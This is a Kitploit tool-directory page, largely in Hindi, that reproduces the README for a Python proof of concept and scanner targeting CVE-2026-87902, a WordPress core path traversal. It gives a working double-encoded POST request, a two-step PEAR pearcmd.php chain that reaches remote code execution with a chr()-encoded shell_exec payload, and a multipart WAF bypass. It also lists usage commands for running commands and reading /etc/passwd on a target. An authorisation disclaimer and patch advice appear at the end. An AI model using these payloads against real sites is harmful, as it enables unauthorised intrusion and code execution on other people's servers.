Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-87902 — CVE-2026-87902 के लिए Python PoC और स्कैनर, जो WordPress core path traversal के कारण LFI और PEAR-आधारित RCE की ओर ले जाता है, WAF bypass और स्वचालित exploitation के साथ। | Kitploit
उपकरण/GitHubGitHub/bhideki/cve-2026-87902
भेद्यता स्कैनरभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणWAF बाईपासवेब सुरक्षापेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubbhideki/cve-2026-87902

CVE-2026-87902

CVE-2026-87902 के लिए Python PoC और स्कैनर, जो WordPress core path traversal के कारण LFI और PEAR-आधारित RCE की ओर ले जाता है, WAF bypass और स्वचालित exploitation के साथ।

11 दिन पहलेअभी तक समीक्षित नहीं
रिपॉजिटरी देखें

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-87902 — WordPress Core पाथ ट्रैवर्सल / LFI / RCE

WordPress core के पेज-टेम्पलेट रिज़ॉल्वर में डबल-एन्कोडेड पाथ ट्रैवर्सल के माध्यम से अनऑथेंटिकेटेड लोकल फ़ाइल इन्क्लूज़न, PEAR-आधारित RCE चेन के साथ।

भेद्यता विवरण

फ़ील्डमान
CVECVE-2026-87902
CVSS9.2 (Critical) — CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CWECWE-98 — Improper Control of Filename for Include/Require
प्रभावितWordPress 4.7.0 – 7.1.1
ठीक किया गयाWordPress 7.1.2 + सभी समर्थित शाखाओं में बैकपोर्ट
प्रमाणीकरणकोई नहीं (अनऑथेंटिकेटेड)

मूल कारण

wp-includes/template.php में get_page_template() सैनिटाइज़ेशन पहले ही चल चुके होने के बाद pagename क्वेरी पैरामीटर पर urldecode() कॉल करता है। एक डबल-एन्कोडेड ../ अनुक्रम (%252E%252E%252F) PHP के पहले डिकोड से %2E%2E%2F के रूप में गुज़रता है, sanitize_title_with_dashes() से बच निकलता है (जो %xx अनुक्रमों को संरक्षित रखता है), और फिर WordPress के विलंबित urldecode() कॉल द्वारा ../ में डिकोड हो जाता है — थीम डायरेक्टरी से बाहर निकल जाता है।

POST मेथड आवश्यक है क्योंकि redirect_canonical() गैर-GET/HEAD अनुरोधों के लिए जल्दी लौट आता है, जिससे भेद्य कोड तक पहुँचने से पहले पाथ को सामान्यीकृत होने से रोका जाता है।

शोषण प्रवाह

root@kitploit:~
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded

page_id=2&pagename=templates%25252E%25252E%25252F%25252E%25252E%25252F...%25252Findex

1. PHP decodes POST body:     templates%252E%252E%252F%252E%252E%252F...%252Findex
2. WP sanitize preserves:     templates%2E%2E%2F%2E%2E%2F...%2Findex
3. get_page_template() urldecode(): templates/../../../index
4. locate_template() resolves: wp-content/themes/<theme>/page-templates/../../../index.php
5. file_exists() succeeds → include() executes the file

प्रभाव

  • लोकल फ़ाइल इन्क्लूज़न — थीम डायरेक्टरी के बाहर की मनमानी .php फ़ाइलें शामिल और निष्पादित की जाती हैं
  • रिमोट कोड एक्ज़ीक्यूशन — PEAR pearcmd.php गैजेट चेन के माध्यम से (PEAR इंस्टॉल + register_argc_argv=On आवश्यक)

PEAR RCE चेन

दो अनाम POST अनुरोध RCE प्राप्त करते हैं:

चरण 1 — ट्रैवर्सल के माध्यम से pearcmd.php शामिल करें। क्वेरी स्ट्रिंग /?+config-create+/<php-payload>+<output>.php PEAR का argv बन जाती है। config-create कमांड हमलावर-नियंत्रित डेटा (PHP टैग सहित) को एक राइटेबल डायरेक्टरी में लिखता है।

चरण 2 — PEAR द्वारा लिखी गई फ़ाइल को शामिल करें। एम्बेडेड PHP वेब-सर्वर विशेषाधिकारों के साथ निष्पादित होता है।

PHP पेलोड chr() एन्कोडिंग (<?=shell_exec(chr(105).chr(100))?>) का उपयोग करते हैं ताकि उन कोट अक्षरों से बचा जा सके जिन्हें wp_magic_quotes() एस्केप कर देगा।

टूल

cve-2026-87902.py — स्वचालित चेकर + LFI स्कैनर + PEAR RCE एक्सप्लॉइट। बाइट-सटीक अनुरोध नियंत्रण के लिए http.client का उपयोग करता है (कोई लाइब्रेरी पुनः-एन्कोडिंग नहीं)।

आवश्यकताएँ

Python 3.6+ (केवल मानक लाइब्रेरी — कोई pip निर्भरता नहीं)

उपयोग

root@kitploit:~
# Check vulnerability only
python3 cve-2026-87902.py https://target.com --check

# Check with WAF bypass (multipart/form-data)
python3 cve-2026-87902.py https://target.com --check --multipart

# Specify page ID and traversal depth
python3 cve-2026-87902.py https://target.com -p 42 --depth 7

# LFI scan (default targets)
python3 cve-2026-87902.py https://target.com

# LFI scan with custom files
python3 cve-2026-87902.py https://target.com -f etc/passwd wp-includes/pluggable

# RCE via PEAR chain
python3 cve-2026-87902.py https://target.com --rce "id"

# Read a file via RCE
python3 cve-2026-87902.py https://target.com --read /etc/hostname

# Full options
python3 cve-2026-87902.py https://target.com --rce "whoami" \
    --pear /usr/local/lib/php/pearcmd \
    --output /tmp/wp-rce-payload \
    --multipart --timeout 30

यह क्या करता है

  1. थीम डिटेक्शन — HTML से सक्रिय थीम निकालता है, page-* डायरेक्टरियों की जाँच करता है
  2. पेज डिस्कवरी — डिफ़ॉल्ट टेम्पलेट वाले प्रकाशित पेजों के लिए REST API से क्वेरी करता है
  3. ट्रैवर्सल टेस्ट — डबल-एन्कोडेड POST पेलोड के साथ कई गहराइयों (1-12) को स्कैन करता है
  4. WAF बायपास — --multipart पेलोड को multipart/form-data में लपेटता है ताकि WAF पैटर्न मिलान से बचा जा सके
  5. LFI स्कैन — ज्ञात WordPress फ़ाइलों को शामिल करता है और प्रतिक्रिया आकारों की बेसलाइन से तुलना करता है
  6. RCE — chr()-एन्कोडेड पेलोड के साथ दो-चरणीय PEAR चेन

आउटपुट मार्कर

मार्करअर्थ
[HIT]फ़ाइल सफलतापूर्वक शामिल की गई
[---]सामान्य प्रतिक्रिया (फ़ाइल शामिल नहीं)
[???]प्रतिक्रिया काफ़ी भिन्न — जाँच के योग्य
[WAF]WAF द्वारा अवरुद्ध (403)
[ERR]कनेक्शन विफल

पूर्वापेक्षाएँ

  • सक्रिय थीम में page-* डायरेक्टरी होनी चाहिए (जैसे page-templates/)
  • डिफ़ॉल्ट टेम्पलेट वाला कम से कम एक प्रकाशित पेज
  • WordPress संस्करण प्रभावित सीमा में (अनपैच्ड)
  • RCE के लिए: PEAR pearcmd.php पठनीय + register_argc_argv=On + राइटेबल /tmp

उपचार

WordPress 7.1.2 या अपनी शाखा के लिए नवीनतम सुरक्षा रिलीज़ में अपडेट करें (4.7 तक बैकपोर्ट उपलब्ध)।

संदर्भ

  • Robert Ressl — CVE-2026-87902 Write-up
  • WordPress Security Advisory — GHSA-7hp8-65ch-5whp
  • Hadrian Vulnerability Alert

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और बग बाउंटी शोध के लिए प्रदान किया गया है। इसका उपयोग केवल उन सिस्टमों के विरुद्ध करें जिनका परीक्षण करने के लिए आपके पास स्पष्ट अनुमति है। कंप्यूटर सिस्टमों तक अनधिकृत पहुँच अवैध है।

टूल डाउनलोड करें